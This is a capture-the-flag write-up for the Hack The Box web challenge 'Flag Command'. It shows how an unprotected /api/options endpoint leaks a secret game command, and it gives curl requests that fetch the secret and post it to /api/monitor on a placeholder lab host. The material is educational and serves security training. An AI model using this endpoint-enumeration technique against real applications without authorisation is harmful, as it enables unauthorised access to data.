~ / writeups / flagcommand

Flag Command

Hack The Box · Very Easy · Web

Very Easy Web Challenge

Challenge Overview

Field Value
Name Flag Command
Category Web
Difficulty Very Easy
Event Cyber Apocalypse 2024
Type Black-box web app — terminal-style "Dimensional Escape Quest" text adventure
Vulnerability Sensitive information disclosure via unprotected /api/options endpoint

Attack surface summary: A browser game that presents a terminal prompt and a branching text adventure. The flag is gated behind a secret command that is only revealed by the backend /api/options endpoint and triggered via POST /api/monitor.

Flag

Flag Value
Flag Command [REDACTED]

Analysis

Opening the app shows a terminal prompt (>> start). Intercepting traffic (Burp Suite / mitmproxy) exposes the client-side JS and one key API endpoint:

Source review of main.js shows the win path: if the player's currentCommand equals the secret option returned by the backend, the app POSTs it to /api/monitor as JSON {"command": currentCommand} — which returns the flag.

The unprotected GET /api/options endpoint leaks the hidden secret command:

curl -s http://<ip>:<port>/api/options
# { "allPossibleCommands": { "...story options..." },
#   "secret": "Blip-blop, in a pickle with a hiccup! Shmiggity-shmack" }

Attack Chain

1. Map the application

Open the web app, note the terminal prompt, and start the game with start. Enumerate the loaded assets via the Network tab / proxy history.

2. Review client-side JavaScript

Trace main.js → game.js → commands.js. main.js imports playerWon() (which prints the GAME_WON string), but the trigger condition lives in the option-check that POSTs a secret command.

3. Pull the secret from /api/options

curl -s http://<ip>:<port>/api/options
# ... "secret": "Blip-blop, in a pickle with a hiccup! Shmiggity-shmack" ...

4. Submit the secret to /api/monitor

curl -s -X POST http://<ip>:<port>/api/monitor \
  -H "Content-Type: application/json" \
  -d '{"command":"Blip-blop, in a pickle with a hiccup! Shmiggity-shmack"}'
# {"message": "[REDACTED]"}

Techniques Demonstrated

  1. Client-side JavaScript source review — traced the win logic across main.js / game.js / commands.js.
  2. HTTP traffic / API endpoint mapping — discovered /api/options and /api/monitor from the app's own requests.
  3. Sensitive information disclosure — unprotected /api/options leaks a hidden "secret" command that unlocks the flag.

Tools Used

Browser DevTools / Burp Suite (or mitmproxy), curl.

← all writeups